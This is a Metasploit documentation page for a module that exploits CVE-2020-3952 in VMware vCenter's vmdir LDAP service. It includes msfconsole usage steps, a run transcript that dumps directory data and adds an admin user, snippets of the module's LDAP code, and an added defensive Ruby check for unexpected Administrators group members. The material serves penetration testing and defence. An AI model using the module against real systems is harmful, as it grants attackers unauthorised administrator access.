VMware vCenter Server vmdir Authentication Bypass - Metasploit
This page contains detailed information about how to use the auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass Metasploit module. For a list of all Metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: VMware vCenter Server vmdir Authentication Bypass
Module: auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass
Source code: modules/auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass.rb
Disclosure date: 2020-04-09
Last modification time: 2022-01-12 16:51:40 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): 636
List of CVEs: CVE-2020-3952
This module bypasses LDAP authentication in VMware vCenter Server's vmdir service to add an arbitrary administrator user. Version 6.7 prior to the 6.7U3f update is vulnerable, but only if it was upgraded from a previous release line, such as 6.0 or 6.5.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Stability:
- service-resource-loss: Module may cause a resource (such as a file or data in a database) to be unavailable for the service.
Side Effects:
- ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).
- config-changes: Module modifies some configuration setting on the target machine.
Basic Usage
msf > use auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass
msf auxiliary(vmware_vcenter_vmdir_auth_bypass) > show targets
... a list of targets ...
msf auxiliary(vmware_vcenter_vmdir_auth_bypass) > set TARGET target-id
msf auxiliary(vmware_vcenter_vmdir_auth_bypass) > show options
... show and set options ...
msf auxiliary(vmware_vcenter_vmdir_auth_bypass) > exploit
Required Options
RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
CheckModule: Module to check with
Knowledge Base
Vulnerable Application
Description
This module bypasses LDAP authentication in VMware vCenter Server's vmdir service to add an arbitrary administrator user. Version 6.7 prior to the 6.7U3f update is vulnerable, but only if it was upgraded from a previous release line, such as 6.0 or 6.5.
Setup
Tested in the wild. No setup notes available at this time, as setup will be specific to target environment.
Verification Steps
Actions
Add
Add an admin user to the vCenter Server.
Options
BASE_DN
If you already have the LDAP base DN, you may set it in this option.
USERNAME
Set this to the username for the new admin user.
PASSWORD
Set this to the password for the new admin user.
Scenarios
VMware vCenter Server 6.7 virtual appliance on ESXi
msf5 > use auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass
msf5 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > options
Module options (auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   BASE_DN                    no        LDAP base DN if you already have it
   PASSWORD                   no        Password of admin user to add
   RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT     636              yes       The target port
   SSL       true             no        Enable SSL on the LDAP connection
   USERNAME                   no        Username of admin user to add

Auxiliary action:

   Name  Description
   ----  -----------
   Add   Add an admin user
msf5 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > set rhosts [redacted]
rhosts => [redacted]
msf5 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > set username msfadmin
username => msfadmin
msf5 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > set password msfadmin
password => msfadmin
msf5 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > run
[*] Running module against [redacted]
not verifying SSL hostname of LDAPS server '[redacted]:636'
[*] Using auxiliary/gather/vmware_vcenter_vmdir_ldap as check
[*] Discovering base DN automatically
[*] Searching root DSE for base DN
dn: cn=DSE Root
namingcontexts: dc=vsphere,dc=local
supportedcontrol: 1.3.6.1.4.1.4203.1.9.1.1
supportedcontrol: 1.3.6.1.4.1.4203.1.9.1.2
supportedcontrol: 1.3.6.1.4.1.4203.1.9.1.3
supportedcontrol: 1.2.840.113556.1.4.417
supportedcontrol: 1.2.840.113556.1.4.319
supportedldapversion: 3
supportedsaslmechanisms: GSSAPI
[+] Discovered base DN: dc=vsphere,dc=local
[*] Dumping LDAP data from vmdir service at [redacted]:636
[+] [redacted]:636 is vulnerable to CVE-2020-3952
[*] Storing LDAP data in loot
[+] Saved LDAP data to /Users/wvu/.msf4/loot/20200417002255_default_[redacted]_VMwarevCenterS_975097.txt
[*] Password and lockout policy:
vmwpasswordchangeautounlockintervalsec: [redacted]
vmwpasswordchangefailedattemptintervalsec: [redacted]
vmwpasswordchangemaxfailedattempts: [redacted]
vmwpasswordlifetimedays: [redacted]
vmwpasswordmaxidenticaladjacentchars: [redacted]
vmwpasswordmaxlength: [redacted]
vmwpasswordminalphabeticcount: [redacted]
vmwpasswordminlength: [redacted]
vmwpasswordminlowercasecount: [redacted]
vmwpasswordminnumericcount: [redacted]
vmwpasswordminspecialcharcount: [redacted]
vmwpasswordminuppercasecount: [redacted]
vmwpasswordprohibitedpreviouscount: [redacted]
[+] Credentials found: [redacted]
[snip]
[*] Bypassing LDAP auth in vmdir service at [redacted]:636
[*] Adding admin user msfadmin with password msfadmin
[+] Added user msfadmin, so auth bypass was successful!
[+] Added user msfadmin to admin group
[*] Auxiliary module execution completed
msf5 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) >
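The transcript above shows the check module discovering the base DN by reading namingcontexts from the root DSE, and the module then adding the new user to the cn=Administrators,cn=Builtin,<base DN> group. The Ruby below is an added example, not code from the Metasploit module: a small LDIF parser (folded continuation lines, base64 "::" values, multi-valued attributes), the same root DSE base-DN lookup, and a defender-side check that lists Administrators group members not on an expected allow-list, which is where a user added by this module would show up in a dump such as the loot file saved above. The sample LDIF is constructed from the root DSE printed above plus a made-up group entry; the helper names are assumptions of this example.

```ruby
# Added example (not part of the Metasploit module): LDIF parsing,
# root DSE base-DN discovery, and an Administrators-group review.

# Parse LDIF text into an Array of records. Each record is a Hash mapping
# a lowercased attribute name to an Array of values. Handles comment lines,
# folded continuation lines (a leading single space), base64 values
# written as "attr:: ..." and multi-valued attributes.
def parse_ldif(text)
  records = []
  current = nil
  # Unfold first: a newline followed by one space joins to the previous line.
  unfolded = text.gsub(/\r?\n /, '')
  unfolded.each_line(chomp: true) do |line|
    if line.strip.empty?
      # Blank line terminates the current record.
      records << current if current && !current.empty?
      current = nil
      next
    end
    next if line.start_with?('#')
    current ||= {}
    # The "::" form must be tested before the single-colon form.
    if (m = line.match(/\A([A-Za-z][\w.;-]*)::\s*(.*)\z/))
      (current[m[1].downcase] ||= []) << m[2].unpack1('m') # base64 decode
    elsif (m = line.match(/\A([A-Za-z][\w.;-]*):\s*(.*)\z/))
      (current[m[1].downcase] ||= []) << m[2]
    else
      raise ArgumentError, "malformed LDIF line: #{line.inspect}"
    end
  end
  records << current if current && !current.empty?
  records
end

# Mirror of the "Discovering base DN automatically" step: vmdir publishes
# the base DN in the root DSE's namingcontexts attribute. Returns the first
# naming context, or nil when the text holds no root DSE record.
def base_dn_from_root_dse(ldif_text)
  records = parse_ldif(ldif_text)
  root = records.find { |r| r['dn']&.first&.casecmp?('cn=DSE Root') } || records.first
  return nil unless root
  (root['namingcontexts'] || root['defaultnamingcontext'])&.first
end

# Defender's view: members of cn=Administrators,cn=Builtin,<base_dn> that are
# not on the expected allow-list (compared case-insensitively). An account
# added by this module appears here in any later LDAP dump.
def unexpected_admins(ldif_text, base_dn, expected_members)
  group_dn = "cn=Administrators,cn=Builtin,#{base_dn}"
  group = parse_ldif(ldif_text).find { |r| r['dn']&.first&.casecmp?(group_dn) }
  return [] unless group
  allowed = expected_members.map(&:downcase)
  (group['member'] || []).reject { |m| allowed.include?(m.downcase) }
end

# Constructed sample: the root DSE as printed by the check module, followed
# by a made-up Administrators group entry. The second member is base64
# encoded at runtime to exercise the "::" form of the parser.
SAMPLE_LDIF = <<~LDIF
  dn: cn=DSE Root
  namingcontexts: dc=vsphere,dc=local
  supportedcontrol: 1.3.6.1.4.1.4203.1.9.1.1
  supportedcontrol: 1.3.6.1.4.1.4203.1.9.1.2
  supportedcontrol: 1.3.6.1.4.1.4203.1.9.1.3
  supportedcontrol: 1.2.840.113556.1.4.417
  supportedcontrol: 1.2.840.113556.1.4.319
  supportedldapversion: 3
  supportedsaslmechanisms: GSSAPI

  dn: cn=Administrators,cn=Builtin,dc=vsphere,dc=local
  cn: Administrators
  member: cn=Administrator,cn=Users,dc=vsphere,dc=local
  member:: #{['cn=msfadmin,cn=Users,dc=vsphere,dc=local'].pack('m0')}
LDIF

if $PROGRAM_NAME == __FILE__
  base = base_dn_from_root_dse(SAMPLE_LDIF)
  puts "Base DN: #{base}"
  known = ['cn=Administrator,cn=Users,dc=vsphere,dc=local']
  puts "Unexpected admins: #{unexpected_admins(SAMPLE_LDIF, base, known).inspect}"
end
```

Run it against the loot file the check module writes (or any LDIF export of the vsphere.local directory) with the organisation's real allow-list in place of the constructed one; an empty result means the built-in Administrators group holds only expected members.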
Msfconsole Usage
Here is how the admin/ldap/vmware_vcenter_vmdir_auth_bypass auxiliary module looks in the msfconsole:
msf6 > use auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass
msf6 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > show info
Name: VMware vCenter Server vmdir Authentication Bypass
Module: auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2020-04-09
Provided by:
Hynek Petrak
JJ Lehmann
Ofri Ziv
wvu <[email protected]>
Module side effects:
ioc-in-logs
config-changes
Module stability:
service-resource-loss
Available actions:
  Name  Description
  ----  -----------
  Add   Add an admin user
Check supported:
Yes
Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  BASE_DN                    no        LDAP base DN if you already have it
  BIND_DN                    no        The username to authenticate to LDAP server
  BIND_PW                    no        Password for the BIND_DN
  PASSWORD                   no        Password of admin user to add
  RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT     636              yes       The target port
  SSL       true             no        Enable SSL on the LDAP connection
  USERNAME                   no        Username of admin user to add
Description:
This module bypasses LDAP authentication in VMware vCenter Server's
vmdir service to add an arbitrary administrator user. Version 6.7
prior to the 6.7U3f update is vulnerable, only if upgraded from a
previous release line, such as 6.0 or 6.5.
References:
https://nvd.nist.gov/vuln/detail/CVE-2020-3952
https://www.guardicore.com/2020/04/pwning-vmware-vcenter-cve-2020-3952/
https://www.vmware.com/security/advisories/VMSA-2020-0006.html
Module Options
This is a complete list of options available in the admin/ldap/vmware_vcenter_vmdir_auth_bypass auxiliary module:
msf6 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > show options
Module options (auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   BASE_DN                    no        LDAP base DN if you already have it
   BIND_DN                    no        The username to authenticate to LDAP server
   BIND_PW                    no        Password for the BIND_DN
   PASSWORD                   no        Password of admin user to add
   RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT     636              yes       The target port
   SSL       true             no        Enable SSL on the LDAP connection
   USERNAME                   no        Username of admin user to add

Auxiliary action:

   Name  Description
   ----  -----------
   Add   Add an admin user
Advanced Options
Here is a complete list of advanced options supported by the admin/ldap/vmware_vcenter_vmdir_auth_bypass auxiliary module:
msf6 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > show advanced
Module advanced options (auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass):

   Name                  Current Setting                             Required  Description
   ----                  ---------------                             --------  -----------
   CheckModule           auxiliary/gather/vmware_vcenter_vmdir_ldap  yes       Module to check with
   LDAP::ConnectTimeout  10.0                                        yes       Timeout for LDAP connect
   VERBOSE               false                                       no        Enable detailed status messages
   WORKSPACE                                                         no        Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the admin/ldap/vmware_vcenter_vmdir_auth_bypass module can do:
msf6 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > show actions
Auxiliary actions:

   Name  Description
   ----  -----------
   Add   Add an admin user
Evasion Options
Here is the full list of possible evasion options supported by the admin/ldap/vmware_vcenter_vmdir_auth_bypass auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > show evasion
Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------
Error Messages
This module may fail with the following error messages:
Check for the possible causes in the code snippets below, taken from the module source code. This can often help in identifying the root cause of the problem.
Please set the USERNAME and PASSWORD options to proceed
Here is a relevant code snippet related to the "Please set the USERNAME and PASSWORD options to proceed" error message:
    "cn=Administrators,cn=Builtin,#{base_dn}"
  end

  def run
    unless username && password
      print_error('Please set the USERNAME and PASSWORD options to proceed')
      return
    end

    # NOTE: check is provided by auxiliary/gather/vmware_vcenter_vmdir_ldap
    checkcode = check
Failed to add admin user <USERNAME>
Here is a relevant code snippet related to the "Failed to add admin user <USERNAME>" error message:
      auth_bypass(ldap)

      print_status("Adding admin user #{username} with password #{password}")

      unless add_admin(ldap)
        print_error("Failed to add admin user #{username}")
      end
    end
  rescue Net::LDAP::Error => e
    print_error("#{e.class}: #{e.message}")
  end
Failed to bypass LDAP auth in vmdir service
Here is a relevant code snippet related to the "Failed to bypass LDAP auth in vmdir service" error message:
      unless ldap.add(dn: user_dn, attributes: user_info)
        res = ldap.get_operation_result

        case res.code
        when Net::LDAP::ResultCodeInsufficientAccessRights
          print_error('Failed to bypass LDAP auth in vmdir service')
        when Net::LDAP::ResultCodeEntryAlreadyExists
          print_error("User #{username} already exists")
        when Net::LDAP::ResultCodeConstraintViolation
          print_error("Password #{password} does not meet policy requirements")
        else
User <USERNAME> already exists
Here is a relevant code snippet related to the "User <USERNAME> already exists" error message:

        case res.code
        when Net::LDAP::ResultCodeInsufficientAccessRights
          print_error('Failed to bypass LDAP auth in vmdir service')
        when Net::LDAP::ResultCodeEntryAlreadyExists
          print_error("User #{username} already exists")
        when Net::LDAP::ResultCodeConstraintViolation
          print_error("Password #{password} does not meet policy requirements")
        else
          print_error("#{res.message}: #{res.error_message}")
        end
Password <PASSWORD> does not meet policy requirements
Here is a relevant code snippet related to the "Password <PASSWORD> does not meet policy requirements" error message:
        when Net::LDAP::ResultCodeInsufficientAccessRights
          print_error('Failed to bypass LDAP auth in vmdir service')
        when Net::LDAP::ResultCodeEntryAlreadyExists
          print_error("User #{username} already exists")
        when Net::LDAP::ResultCodeConstraintViolation
          print_error("Password #{password} does not meet policy requirements")
        else
          print_error("#{res.message}: #{res.error_message}")
        end

        return false
User <USERNAME> is already an admin
Here is a relevant code snippet related to the "User <USERNAME> is already an admin" error message:
      # Add our user to the admin group
      unless ldap.add_attribute(group_dn, 'member', user_dn)
        res = ldap.get_operation_result

        if res.code == Net::LDAP::ResultCodeAttributeOrValueExists
          print_error("User #{username} is already an admin")
        else
          print_error("#{res.message}: #{res.error_message}")
        end

        return false
Related Pull Requests
- #14734 Merged Pull Request: Rubocop recently landed modules
- #13885 Merged Pull Request: Add LDAPS support and update VMware vCenter Server vmdir (CVE-2020-3952) modules
- #13868 Merged Pull Request: Add hash dumping to auxiliary/gather/vmware_vcenter_vmdir_ldap (CVE-2020-3952)
- #13503 Merged Pull Request: Add BASE_DN and ROOT_KEY options to VMware vCenter vmdir and SaltStack Salt modules
- #13253 Merged Pull Request: Add VMware vCenter Server vmdir Information Disclosure and Authentication Bypass (CVE-2020-3952), plus LDAP mixin
References
- CVE-2020-3952
- https://www.guardicore.com/2020/04/pwning-vmware-vcenter-cve-2020-3952/
- https://www.vmware.com/security/advisories/VMSA-2020-0006.html
See Also
Check also the following modules related to this module:
- auxiliary/gather/ldap_hashdump
- auxiliary/gather/vmware_vcenter_vmdir_ldap
- auxiliary/admin/ldap/rbcd
- auxiliary/scanner/vmware/vmware_enum_permissions
- auxiliary/scanner/vmware/vmware_enum_sessions
- auxiliary/scanner/vmware/vmware_enum_users
- auxiliary/scanner/vmware/vmware_enum_vms
- auxiliary/scanner/vmware/vmware_host_details
- auxiliary/scanner/vmware/vmware_http_login
- auxiliary/scanner/vmware/vmware_screenshot_stealer
- auxiliary/scanner/vmware/vmware_server_dir_trav
- auxiliary/scanner/vmware/vmware_update_manager_traversal
- exploit/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144
- exploit/linux/http/vmware_vcenter_analytics_file_upload
- exploit/linux/http/vmware_vcenter_vsan_health_rce
- exploit/linux/http/vmware_view_planner_4_6_uploadlog_rce
- exploit/linux/http/vmware_vrops_mgr_ssrf_rce
- exploit/linux/http/vmware_workspace_one_access_cve_2022_22954
- exploit/linux/local/vmware_alsa_config
- exploit/linux/local/vmware_mount
- exploit/linux/local/vmware_workspace_one_access_certproxy_lpe
- exploit/linux/ssh/vmware_vdp_known_privkey
- exploit/multi/http/vmware_vcenter_log4shell
- exploit/multi/http/vmware_vcenter_uploadova_rce
- exploit/osx/local/vmware_bash_function_root
- exploit/osx/local/vmware_fusion_lpe
- exploit/windows/http/vmware_vcenter_chargeback_upload
- auxiliary/admin/vmware/poweroff_vm
- auxiliary/admin/vmware/poweron_vm
- auxiliary/admin/vmware/tag_vm
- auxiliary/admin/vmware/terminate_esx_sessions
- auxiliary/admin/vmware/vcenter_forge_saml_token
- auxiliary/admin/vmware/vcenter_offline_mdb_extract
- exploit/windows/ldap/imail_thc
- exploit/windows/ldap/pgp_keyserver7
Authors
- Hynek Petrak
- JJ Lehmann
- Ofri Ziv
- wvu
Version
This page has been produced using Metasploit Framework version 6.2.29-dev. For more modules, visit the Metasploit Module Library.